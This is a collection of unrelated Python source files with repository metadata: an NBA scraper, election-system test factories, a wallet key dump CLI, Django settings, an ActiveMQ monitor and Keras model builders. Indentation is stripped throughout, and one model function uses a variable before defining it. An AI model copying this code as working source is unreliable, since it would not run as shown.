:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_per_game.html', year)
def per_36(self, url, year):
""" This gets the per-36-game statistics in a season
:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_per_minute.html', year)
def per_100(self, url, year):
""" This gets the per-100-game statistics in a season
:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_per_poss.html', year)
def advanced(self, url, year):
""" This gets the advanced statistics in a season
:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_advanced.html', year)
def play(self, url, year):
""" This gets the play-by-play statistics in a season
:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_play-by-play.html', year)
def shooting(self, url, year):
""" This gets the shooting statistics in a season
:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_shooting.html', year)
def adjusted_shooting(self, url, year):
""" This gets the adjusted shooting statistics in a season
:param url: an attribute of nba_request object
:param year: an integer as a season year
:return:
df: a data pandas frame
"""
return self.parse_url(url, '_adj_shooting.html', year)
def parse_url(self, url, extension, year):
""" Return a panda dataframe based on the extension and season
:param url: (string) an attribute of nba_request object
:param extension: (string) user specified
:param year: (integer) user specified
:return:
stats: a pandas dataframe
"""
# NBA season we will be analyzing
# URL page we will scraping (see image above)
merger = "{}" + extension
temp = url + merger.format(year)
# this is the HTML from the given URL
html = urlopen(temp)
soup = BeautifulSoup(html, features='lxml')
# use findALL() to get the column headers
soup.findAll('tr', limit=2)
# use getText()to extract the text we need into a list
headers = [th.getText() for th in soup.findAll('tr', limit=2)[0].findAll('th')]
# exclude the first column as we will not need the ranking order from Basketball Reference for the analysis
headers = headers[1:]
headers
# avoid the first header row
rows = soup.findAll('tr')[1:]
player_stats = [[td.getText() for td in rows[i].findAll('td')]
for i in range(len(rows))]
stats = pd.DataFrame(player_stats, columns = headers)
return stats
| 3.59375 | 4 |
rollgen/tests/factories.py | SmartElect/SmartElect | 23 | 12761528 | <reponame>SmartElect/SmartElect
# Python imports
import os
import random
# 3rd party imports
import factory
# project imports
from ..constants import CITIZEN_SORT_FIELDS
from civil_registry.models import Citizen
from civil_registry.tests.factories import CitizenFactory
from libya_elections.constants import MALE, FEMALE
from register.tests.factories import RegistrationFactory, SMSFactory
filename = os.path.join(os.path.dirname(__file__), '_random_arabic_person_names.txt')
with open(filename, 'rb') as f:
words = f.read().decode('utf-8')
# Remove blank lines and extraneous whitespace.
person_names = [word.strip() for word in words.split('\n') if word.strip()]
filename = os.path.join(os.path.dirname(__file__), '_random_arabic_place_names.txt')
with open(filename, 'rb') as f:
words = f.read().decode('utf-8')
# Remove blank lines and extraneous whitespace.
place_names = [word.strip() for word in words.split('\n') if word.strip()]
def generate_arabic_place_name(min_length=0):
"""Return a randomly generated, potentially multi-word fake Arabic place name"""
make_name = lambda n_words: ' '.join(random.sample(place_names, n_words))
n_words = 3
name = make_name(n_words)
while len(name) < min_length:
n_words += 1
name = make_name(n_words)
return name
def create_voters(n_voters, gender=None, center=None):
"""Create voters in bulk, with options not available via the factory"""
toggle_gender = not bool(gender)
if not gender:
gender = MALE
# I create a dummy SMS here for optimization. If the VoterFactory creates a registration for
# each user and I don't pass an SMS instance, it will create an SMS for each registration which
# triggers the creation of a Citizen and a Backend. Passing a dummy SMS reduces this overhead
# from O(3 * n_voters) to O(1). It's logically incorrect to associate the same SMS with multiple
# registrations, but rollgen doesn't pay attention to SMSes.
sms = SMSFactory()
voter_ids = []
for i in range(n_voters):
if toggle_gender:
gender = FEMALE if (gender == MALE) else MALE
voter = VoterFactory(gender=gender, post__center=center, post__sms=sms)
voter_ids.append(voter.pk)
# It's a bit painful performance-wise, but in order to sort these the same way as
# get_voter_roll(), I have to let the database do the sorting.
return list(Citizen.objects.filter(pk__in=voter_ids).order_by(*CITIZEN_SORT_FIELDS))
class VoterFactory(CitizenFactory):
"""Create a voter with a random Arabic name"""
@factory.post_generation
def post(instance, create, extracted, **kwargs):
instance.first_name = random.choice(person_names)
instance.father_name = random.choice(person_names)
instance.grandfather_name = random.choice(person_names)
instance.family_name = random.choice(person_names)
instance.mother_name = random.choice(person_names)
if kwargs['center']:
# Register this voter to this center
reg_kwargs = dict(citizen=instance, registration_center=kwargs['center'],
archive_time=None)
if 'sms' in kwargs and kwargs['sms']:
reg_kwargs['sms'] = kwargs['sms']
RegistrationFactory(**reg_kwargs)
| 2.828125 | 3 |
targets_cb.py | ludios/Minerva | 1 | 12761529 | <filename>targets_cb.py
# This file is used by build_autocachebreakers.py
# Note: both outputs and breakers[n][1] are relative to this file's directory.
targets = [
{"output": "js_minerva/cw/net/autocachebreakers.js",
"breakers": [
("cw.net.breaker_FlashConnector_swf", "minerva/compiled_client/FlashConnector.swf"),
]},
]
| 1.234375 | 1 |
libs/python/stupendous_cow/__init__.py | tomault/stupendous-cow | 0 | 12761530 | """Python packages that contain the common code for the "stupendous-cow"
article indexing and search system."""
| 1.070313 | 1 |
walletlib/scripts/dumpwallet.py | satoshi-n/walletlib | 0 | 12761531 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""CLI Interface to Walletlib
This is a simple implementation to allow walletlib to be used from the cli.
It will certainly gain more features as they are added. Currently it takes a wallet.dat file and dumps either a full
seet of its contents or just the keys out.
"""
import click
from walletlib import Walletdat, ProtobufWallet
import json
@click.command()
@click.argument("filename", type=click.Path(exists=True))
@click.option("-p", "--password", help="Password if any", type=click.STRING)
@click.option(
"-o", "--output", help="File to save to. If not set, results only will be displayed"
)
@click.option(
"-v",
"--versionprefix",
type=int,
help="Force output to use this p2pkh version byte",
)
@click.option(
"-s", "--secretprefix", type=int, help="Force output to use this WIF version byte"
)
@click.option("--keys", is_flag=True, help="Only dump keys.")
def main(filename, password, output, versionprefix, secretprefix, keys):
if filename.endswith(".dat"):
w = Walletdat.load(filename)
click.echo("Loaded file")
if password:
w.parse(passphrase=str(password))
else:
w.parse()
click.echo(
"Found {} keypairs and {} transactions".format(len(w.keypairs), len(w.txes))
)
click.echo("Default version byte: {}".format(w.default_wifnetwork))
if keys:
if not output:
d = w.dump_keys(version=versionprefix, privkey_prefix_override=secretprefix)
click.echo(json.dumps(d, sort_keys=True, indent=4))
else:
w.dump_keys(output, version=versionprefix, privkey_prefix_override=secretprefix)
else:
if not output:
d = w.dump_all(version=versionprefix, privkey_prefix_override=secretprefix)
click.echo(json.dumps(d, sort_keys=True, indent=4))
else:
w.dump_all(output, version=versionprefix, privkey_prefix_override=secretprefix)
click.echo("Done")
else:
try:
w = ProtobufWallet.load(filename)
click.echo("Loaded file")
if password:
w.parse(passphrase=str(password))
else:
w.parse()
click.echo("Found {} keypairs and {} transactions".format(len(w.keypairs), len(w.txes)))
click.echo("Default version byte: {}".format(w.default_wifnetwork))
if keys:
if not output:
d = w.dump_keys()
click.echo(json.dumps(d, sort_keys=True, indent=4))
else:
w.dump_keys(output)
else:
if not output:
d = w.dump_all()
click.echo(json.dumps(d, sort_keys=True, indent=4))
else:
w.dump_all(output)
click.echo("Done")
except:
click.echo("Error, cannot read wallet file")
| 2.484375 | 2 |
Inversion/inputData_generation.py | ycli0536/RES-Inv | 4 | 12761532 | <reponame>ycli0536/RES-Inv
import numpy as np
import os
from getConfig import gConfig
from data_generation import data_preprocessing
generator = data_preprocessing()
data_for_pred = generator.inputData_2d(dataPath=gConfig['datapath'],
data_file=gConfig['data_file_name'],
num_samples=gConfig['num_samples'],
im_dim=gConfig['im_dim'],
num_channels=gConfig['num_channels'],
data_form='raw'
)
save_path = gConfig['predictionpath']
np.save(os.path.join(save_path, 'X_test'), data_for_pred)
print('Data for prediction saved at: ', save_path) | 2.25 | 2 |
soil/graphs/views.py | mabbettbyron/terraprobe | 2 | 12761533 | from django.http import HttpResponse
from django.template import loader
def customer_weekly(request, site_id):
template = loader.get_template('customer_weekly.html')
context = {
# 'site_id' : site_id,
}
return HttpResponse(template.render(context, request))
def serve_svg(request):
template = loader.get_template('serve_svg.html')
context = {
# 'site_id' : site_id,
}
return HttpResponse(template.render(context, request))
| 2.03125 | 2 |
django_q/compat.py | Balletie/django-q | 0 | 12761534 | from __future__ import absolute_import
"""
Compatibility layer.
Intentionally replaces use of python-future
"""
# https://github.com/Koed00/django-q/issues/4
try:
range = xrange
except NameError:
range = range
| 1.414063 | 1 |
django_react/settings.py | AmbiteamProject/spleeter-web | 202 | 12761535 | <gh_stars>100-1000
import os
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = os.getenv('SECRET_KEY', 'sekrit')
YOUTUBE_API_KEY = os.getenv('YOUTUBE_API_KEY', '')
CPU_SEPARATION = bool(int(os.getenv('CPU_SEPARATION', '1')))
ALLOWED_HOSTS = [os.getenv('APP_HOST'), '0.0.0.0', '127.0.0.1', 'localhost']
DEFAULT_FILE_STORAGE = 'api.storage.AzureStorage'
# DEFAULT_FILE_STORAGE = 'api.storage.S3Boto3Storage'
# DEFAULT_FILE_STORAGE = 'api.storage.FileSystemStorage'
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
##################################
# Azure storage backend settings #
##################################
AZURE_ACCOUNT_KEY = os.getenv('AZURE_ACCOUNT_KEY', '')
AZURE_ACCOUNT_NAME = os.getenv('AZURE_ACCOUNT_NAME', '')
AZURE_CONTAINER = os.getenv('AZURE_CONTAINER', '')
AZURE_CUSTOM_DOMAIN = os.getenv('AZURE_CUSTOM_DOMAIN')
AZURE_OBJECT_PARAMETERS = {'content_disposition': 'attachment'}
################################
# AWS storage backend settings #
################################
AWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID', '')
AWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY', '')
AWS_STORAGE_BUCKET_NAME = os.getenv('AWS_STORAGE_BUCKET_NAME', '')
AWS_S3_CUSTOM_DOMAIN = os.getenv('AWS_S3_CUSTOM_DOMAIN')
# A path prefix that will be prepended to all uploads
AWS_LOCATION = 'media'
# Disable query parameter authentication (for public reads)
AWS_QUERYSTRING_AUTH = False
# Make uploaded files publicly accessible and downloadable
AWS_S3_OBJECT_PARAMETERS = {'ACL': 'public-read', 'ContentDisposition': 'attachment'}
# S3 region
AWS_S3_REGION_NAME = 'us-east-1'
CELERY_BROKER_URL = os.getenv('CELERY_BROKER_URL', 'redis://localhost:6379/0')
CELERY_RESULT_BACKEND = os.getenv('CELERY_RESULT_BACKEND', 'redis://localhost:6379/0')
CELERY_TASK_ROUTES = {
'api.tasks.create_static_mix': {
'queue': 'slow_queue'
},
'api.tasks.create_dynamic_mix': {
'queue': 'slow_queue'
},
'api.tasks.fetch_youtube_audio': {
'queue': 'fast_queue'
},
}
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'spleeter-web.sqlite3',
}
}
MEDIA_ROOT = 'media'
MEDIA_URL = '/media/'
SEPARATE_DIR = 'separate'
UPLOAD_DIR = 'uploads'
VALID_MIME_TYPES = [
'audio/aac', 'audio/aiff', 'audio/x-aiff', 'audio/ogg', 'video/ogg', 'application/ogg', 'audio/opus', 'audio/vorbis', 'audio/mpeg',
'audio/mp3', 'audio/mpeg3', 'audio/x-mpeg-3', 'video/mpeg', 'audio/m4a', 'audio/x-m4a', 'audio/x-hx-aac-adts', 'audio/mp4', 'video/x-mpeg',
'audio/flac', 'audio/x-flac', 'audio/wav', 'audio/x-wav', 'audio/webm', 'video/webm'
]
VALID_FILE_EXT = [
# Lossless
'.aif',
'.aifc',
'.aiff',
'.flac',
'.wav',
# Lossy
'.aac',
'.m4a',
'.mp3',
'.opus',
'.weba',
'.webm',
# Ogg (Lossy)
'.ogg',
'.oga',
'.mogg'
]
UPLOAD_FILE_SIZE_LIMIT = 100 * 1024 * 1024
YOUTUBE_LENGTH_LIMIT = 30 * 60
YOUTUBE_MAX_RETRIES = 3
# Application definition
INSTALLED_APPS = [
'whitenoise.runserver_nostatic',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api.apps.ApiConfig',
'frontend.apps.FrontendConfig',
'rest_framework',
'webpack_loader'
]
WEBPACK_LOADER = {
'DEFAULT': {
'BUNDLE_DIR_NAME': 'dist/',
'STATS_FILE': os.path.join(BASE_DIR, 'frontend', 'assets', 'webpack-stats.json')
}
}
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
)
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware'
]
ROOT_URLCONF = 'django_react.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'frontend', 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'frontend.context_processors.debug',
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_react.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'frontend', 'assets'),
)
# Override production variables if DJANGO_DEVELOPMENT env variable is set
if os.getenv('DJANGO_DEVELOPMENT'):
from .settings_dev import *
| 1.5625 | 2 |
src/jaws_scripts/client/set_effective_registration.py | JeffersonLab/kafka-alarm-scripts | 0 | 12761536 | #!/usr/bin/env python3
"""
Set effective registration.
**Note**: This is generally for testing only and should be done automatically via
`jaws-effective-processor <https://github.com/JeffersonLab/jaws-effective-processor>`_
"""
import click
from jaws_libp.clients import EffectiveRegistrationProducer
from jaws_libp.entities import EffectiveRegistration, \
AlarmInstance, SimpleProducer
# pylint: disable=duplicate-code
def __get_instance():
return AlarmInstance("base",
SimpleProducer(),
["INJ"],
"alarm1",
"command1")
# pylint: disable=missing-function-docstring,no-value-for-parameter
@click.command()
@click.option('--unset', is_flag=True, help="present to clear state, missing to set state")
@click.argument('name')
def set_effective_registration(unset, name):
producer = EffectiveRegistrationProducer('set_effective_registration.py')
key = name
if unset:
value = None
else:
alarm_class = None
alarm_instance = __get_instance()
value = EffectiveRegistration(alarm_class, alarm_instance)
producer.send(key, value)
def click_main() -> None:
set_effective_registration()
if __name__ == "__main__":
click_main()
| 2.296875 | 2 |
serieswatcher/serieswatcher/windows/about.py | lightcode/SeriesWatcher | 0 | 12761537 | <filename>serieswatcher/serieswatcher/windows/about.py
# -*- coding: utf-8 -*-
from PyQt4 import QtGui
from serieswatcher.const import TEXT_VERSION, RELEASE_DATE
class About(QtGui.QDialog):
"""Class to create the window 'about'."""
def __init__(self, parent=None):
"""Create the window 'about'."""
super(About, self).__init__(parent)
self.setWindowTitle('A propos')
ABOUT = (
u'SeriesWatcher %s - %s<br/>'
u'Créé par <NAME> publié sur '
u'<a href="http://lightcode.fr">LightCode.fr</a> sous licence GPL.'
u'<hr/>'
u'Base de donnée : '
u'<a href="http://thetvdb.com">TheTVDB.com</a><br/>'
u'Librairies Python externes : desktop, PyQt4, ConfigParser3.2, '
u'LibVLC, SQLObject.'
) % (TEXT_VERSION, RELEASE_DATE)
text = QtGui.QLabel(ABOUT)
text.setOpenExternalLinks(True)
layout = QtGui.QVBoxLayout()
layout.addWidget(text)
self.setLayout(layout)
| 2.484375 | 2 |
data/train/python/0bab5f05bf4eda7b914196e4788f5b171b189c47simpleActivemqMonitor.py | harshp8l/deep-learning-lang-detection | 84 | 12761538 | #-*-coding:utf-8-*-
'use restful api to monitor activemq broker'
__author__ = 'afred.lyj'
import httplib
import urllib
import base64
import json
import logging
from logging.handlers import TimedRotatingFileHandler
logHandler = TimedRotatingFileHandler("logfile.log",when="d", interval=1, backupCount=5)
logFormatter = logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
logHandler.setFormatter(logFormatter)
logHandler.suffix = "%Y%m%d" # 设置后缀
logger = logging.getLogger('activemqMonitorLog')
logger.addHandler(logHandler)
logger.setLevel(logging.INFO)
username = 'admin'
password = '<PASSWORD>'
mqList='192.168.1.101:8161:example.MyQueue,opaycenter_queue_notify_2000;192.168.1.102:8161:example.MyQueue,opaycenter_queue_notify_2000'
#logging.basicConfig(filename="activemqMonitor.log", level=logging.DEBUG)
def parseMqList(mqList):
li = mqList.split(';')
l = list()
for entry in li:
d = dict()
broker = entry.split(':')
d['host'] = broker[0]
d['port'] = broker[1]
queues = broker[2].split(',')
d['queues'] = queues
l.append(d)
return l
def httpGet(host,port,url,timeout=10):
#print("httpget the host:%s,port:%d, the param:%s" %(host,port,url))
base64String = base64.encodestring('%s:%s' % (username, password))
authHeader = 'Basic %s' % base64String
headers = {'Authorization': authHeader}
try:
conn = httplib.HTTPConnection(host,port=port,timeout=timeout)
conn.request("GET",url, None, headers)
response = conn.getresponse()
#print("status:"+str(response.status)+", reason:"+str(response.reason))
if response.status == httplib.OK:
data = response.read()
return data
except Exception, e:
logger.error(e)
return "";
def checkBrokerAttribute(host, port, attribute):
uri = "/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost/" + attribute
response = httpGet(host, port, uri)
#print response
if response:
result = json.loads(response)
percent = result['value']
if percent >= 10:
print "alert : the usage of broker memory arrived %d" % percent
return True
else:
print "everything is ok, haha"
return False
else:
print "alert : mq broker is shutdown, please try to restart it"
return True
def checkBroker(host, port):
return checkBrokerAttribute(host, port, 'MemoryPercentUsage') or checkBrokerAttribute(host, port, 'StorePercentUsage')
def checkQueue(host, port, queueName):
uri = "/api/jolokia/read/org.apache.activemq:type=Broker,brokerName=localhost,destinationType=Queue,destinationName=%s/" % queueName
#print uri
response = httpGet(host, port, uri)
#print response
if response:
result = json.loads(response)
values = result.get('value')
#print values
queueSize = values.get('QueueSize')
if queueSize > 10:
print "current queue size is %d, need alert" % queueSize
memoryPercentUsage = values.get('MemoryPercentUsage')
if memoryPercentUsage > 10:
print 'current queue memory percent usage %d, need alert' % memoryPercentUsage
else:
print 'no response from activemq broker, need alert'
if __name__=='__main__':
logger.info("hello")
l = parseMqList(mqList)
#print l
for broker in l:
brokerDown = checkBroker(broker['host'], int(broker['port']))
#print brokerDown
if brokerDown:
continue;
#checkBroker(broker['host'], int(broker['port']), 'StorePercentUsage')
queues = broker.get('queues')
for queue in queues:
checkQueue(broker['host'], int(broker['port']), queue)
| 2.34375 | 2 |
nicu_los/src/utils/modelling.py | bt-s/NICU-length-of-stay-prediction | 2 | 12761539 | #!/usr/bin/python3
"""modelling.py
Various utility functions for modelling
"""
__author__ = "<NAME>"
import os
import numpy as np
import tensorflow as tf
from tensorflow.keras.callbacks import Callback
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Activation, BatchNormalization, \
Bidirectional, concatenate, Conv1D, Dense, Dropout, \
GlobalAveragePooling1D, GRU, Input, LSTM, Masking, \
SpatialDropout1D
from tensorflow.keras.losses import MeanAbsoluteError, \
SparseCategoricalCrossentropy
from tensorflow.keras.optimizers import Adam
from nicu_los.src.utils.evaluation import evaluate_classification_model, \
evaluate_regression_model
from nicu_los.src.utils.custom_keras_layers import ApplyMask, \
squeeze_excite_block, Slice
def construct_rnn(input_dimension, output_dimension, model_type='lstm',
n_cells=1, dropout=0.3, hid_dimension=64, model_name=""):
"""Construct an RNN model (either LSTM or GRU)
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
n_cells (int): Number of RNN cells
dropout (float): Amount of dropout to apply after each RNN cell
hid_dimension (int): Dimension of the hidden layer (i.e. # of unit in
the RNN cell)
Returns:
model (tf.keras.Model): Constructed RNN model
"""
inputs = Input(shape=(None, input_dimension))
# Skip timestep if all values of the input tensor are 0
X = Masking()(inputs)
num_hid_units = hid_dimension
for layer in range(n_cells - 1):
num_hid_units = num_hid_units // 2
if model_type == 'lstm':
cell = LSTM(units=num_hid_units, activation='tanh',
return_sequences=True, recurrent_dropout=0.0,
dropout=dropout)
elif model_type == 'gru':
cell = GRU(units=num_hid_units, activation='tanh',
return_sequences=True, recurrent_dropout=0.0,
dropout=dropout)
else:
raise ValueError("Parameter 'model_type' should be one of " +
"'lstm' or 'gru'.")
X = Bidirectional(cell)(X)
# There always has to be at least one cell
if model_type == 'lstm':
X = LSTM(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
return_sequences=False, units=hid_dimension)(X)
elif model_type == 'gru':
X = GRU(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
return_sequences=False, units=hid_dimension)(X)
else:
raise ValueError("Parameter 'model_type' should be one of " +
"'lstm' or 'gru'.")
if dropout:
X = Dropout(dropout)(X)
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_fcn(input_dimension, output_dimension, dropout=0.5,
model_name=""):
"""Construct an FCN model for multivariate time series classification
(Karim et al. 2019 - Multivariate LSTM-FCNs for time series classification)
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
dropout (float): Amount of dropout to apply in the first two
convolutional blocks
model_name (str): Name of the model
Returns:
model (tf.keras.Model): Constructed CN model
"""
inputs = Input(shape=(None, input_dimension))
mask = Masking().compute_mask(inputs)
X = Conv1D(128, 8, padding='same',
kernel_initializer='he_uniform')(inputs)
X = Activation('relu')(X)
X = BatchNormalization()(X)
X = SpatialDropout1D(dropout)(X)
X = ApplyMask()(X, mask)
X = squeeze_excite_block(X, mask)
X = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(X)
X = Activation('relu')(X)
X = BatchNormalization()(X)
X = SpatialDropout1D(dropout)(X)
X = ApplyMask()(X, mask)
X = squeeze_excite_block(X, mask)
X = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(X)
X = Activation('relu')(X)
X = BatchNormalization()(X)
X = GlobalAveragePooling1D()(X, mask)
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_fcn_originial(input_dimension, output_dimension, model_name=""):
"""Construct an FCN model for multivariate time series classification
(Karim et al. 2019 - Multivariate LSTM-FCNs for time series classification)
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
model_name (str): Name of the model
Returns:
model (tf.keras.Model): Constructed CN model
"""
inputs = Input(shape=(None, input_dimension))
X = Conv1D(128, 8, padding='same',
kernel_initializer='he_uniform')(inputs)
X = BatchNormalization()(X2)
X = Activation('relu')(X2)
X = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(X2)
X = BatchNormalization()(X2)
X = Activation('relu')(X2)
X = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(X2)
X = BatchNormalization()(X2)
X = Activation('relu')(X2)
X = GlobalAveragePooling1D()(X2)
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_lstm_fcn_original(input_dimension, output_dimension, dropout=0.8,
hid_dimension_lstm=8, model_name=""):
"""Construct an LSTM-FCN model
Architecture as described in:
Karim et al. 2019 - Multivariate LSTM-FCNs for time series classification
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
dropout (float): Amount of dropout to apply after the LSTM cell
hid_dimension (int): Dimension of the hidden layer (i.e. # of unit in
the RNN cell)
model_name (str): Name of the model
Returns:
model (tf.keras.Model): Constructed LSTM-FCN model
"""
inputs = Input(shape=(None, input_dimension))
X1 = Masking()(inputs)
X1 = LSTM(hid_dimension_lstm)(X1)
X1 = Dropout(dropout)(X1)
X2 = Conv1D(128, 8, padding='same',
kernel_initializer='he_uniform')(inputs)
X2 = BatchNormalization()(X2)
X2 = Activation('relu')(X2)
X2 = squeeze_excite_block(X2)
X2 = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(X2)
X2 = BatchNormalization()(X2)
X2 = Activation('relu')(X2)
X2 = squeeze_excite_block(X2)
X2 = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(X2)
X2 = BatchNormalization()(X2)
X2 = Activation('relu')(X2)
X2 = GlobalAveragePooling1D()(X2)
X = concatenate([X1, X2])
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_lstm_fcn(input_dimension, output_dimension, dropout=0.5,
hid_dimension_lstm=16, model_name=""):
"""Construct a (modified) LSTM-FCN model
Modified architecture:
- Perform batch normalization after ReLU activation
- Use SpatialDropout1D in the convolutional blocks to reduce overfitting
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
dropout (float): Amount of dropout to apply after the LSTM cell
hid_dimension (int): Dimension of the hidden layer (i.e. # of unit in
the RNN cell)
model_name (str): Name of the model
Returns:
model (tf.keras.Model): Constructed LSTM-FCN model
"""
inputs = Input(shape=(None, input_dimension))
mask = Masking().compute_mask(inputs)
X1 = Masking()(inputs)
X1 = LSTM(hid_dimension_lstm)(X1)
X1 = Dropout(dropout)(X1)
X2 = Conv1D(128, 8, padding='same',
kernel_initializer='he_uniform')(inputs)
X2 = Activation('relu')(X2)
X2 = BatchNormalization()(X2)
X2 = SpatialDropout1D(0.5)(X2)
X2 = ApplyMask()(X2, mask)
X2 = squeeze_excite_block(X2, mask)
X2 = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(X2)
X2 = Activation('relu')(X2)
X2 = BatchNormalization()(X2)
X2 = SpatialDropout1D(0.5)(X2)
X2 = ApplyMask()(X2, mask)
X2 = squeeze_excite_block(X2, mask)
X2 = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(X2)
X2 = Activation('relu')(X2)
X2 = BatchNormalization()(X2)
X2 = GlobalAveragePooling1D()(X2, mask)
X = concatenate([X1, X2])
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_channel_wise_rnn(input_dimension, output_dimension,
model_type='lstm_cw', dropout=0.0, global_dropout=0.0, hid_dimension=16,
multiplier=4, model_name=""):
"""Construct an RNN model (either LSTM or GRU)
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
dropout (float): Amount of dropout to apply after each RNN cell
global_dropout (float): Amount of dropout to apply before the output
hid_dimension (int): Dimension of the hidden layer (i.e. # of unit in
the RNN cell)
multiplier (int): Multiplier for the hidden dimension of the global LSTM
Returns:
model (tf.keras.Model): Constructed channel-wise RNN model
"""
inputs = Input(shape=(None, input_dimension))
# Skip timestep if all values of the input tensor are 0
mask = Masking().compute_mask(inputs)
X = Masking()(inputs)
# Train LSTMs over the channels, and append them
cXs = []
for feature in range(int(input_dimension/2)):
mask_var = int(feature+input_dimension/2)
channel_slice = Slice(feature, mask_var)(X)
num_hid_units = hid_dimension // 2
cell = LSTM(units=num_hid_units, activation='tanh',
return_sequences=True, recurrent_dropout=dropout,
dropout=dropout)
cX = Bidirectional(cell)(channel_slice)
cX = ApplyMask()(cX, mask)
cXs.append(cX)
# Concatenate the channels
X = concatenate(cXs, axis=2)
X = Masking()(X)
# There always has to be at least one cell
if model_type == 'lstm_cw':
X = LSTM(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
return_sequences=False, units=multiplier*hid_dimension)(X)
elif model_type == 'gru_cw':
X = GRU(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
return_sequences=False, units=multiplier*hid_dimension)(X)
else:
raise ValueError("Parameter 'model_type' should be one of " +
"'lstm_cw' or 'gru_cw'.")
if global_dropout:
X = Dropout(global_dropout)(X)
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_and_compile_model(model_type, model_name, task, checkpoint_file,
checkpoints_dir, model_params={}):
"""Construct and compile a model of a specific type
Args:
model_type (str): The type of model to be constructed
model_name (str): The name of model to be constructed
task (str): Either 'regression' or 'classification'
checkpoint_file (str): Name of a checkpoint file
checkpoints_dir (str): Path to the checkpoints directory
model_params (dict): Possible hyper-parameters for the model to be
constructed
Returns:
model (tf.keras.Model): Constructed and compiled model
"""
n_cells = model_params['n_cells']
input_dimension = model_params['input_dimension']
output_dimension = model_params['output_dimension']
dropout = model_params['dropout']
global_dropout = model_params['global_dropout']
hid_dimension = model_params['hidden_dimension']
multiplier = model_params['multiplier']
